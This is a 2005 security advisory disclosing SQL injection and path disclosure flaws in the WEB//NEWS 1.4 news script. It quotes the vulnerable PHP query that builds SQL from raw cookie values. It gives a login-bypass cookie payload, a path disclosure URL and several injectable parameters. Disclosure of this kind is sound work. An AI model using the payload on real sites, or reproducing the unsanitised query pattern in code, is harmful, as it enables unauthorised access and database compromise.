[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities
[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================
Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High
Date: Sep. 1 2005
Vendor: Stylemotion
Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net
Description:
============
WEB//News is a Newsscript which features like an CMS
Vulnerability:
==============
In the modules/startup.php
$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING
(groupid)
WHERE
( userid='".$_COOKIE['wn_userid']."' AND
password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");
As we can see, the $_COOKIE paramter is not checked. Below i've added how you
have to set the Cookies
to take advantage of these vulnerability (send this to index.php):
wn_userid=1; wn_userpw=0' OR '1'='1
Path Disclosure:
No file in he /actions dir is testet if it is directly included.
Example:
/actions/cat.add.php?name=A
Nearly every REQUEST variable is not checked so there are a few of
SQL-Injections availiable
A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]
Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe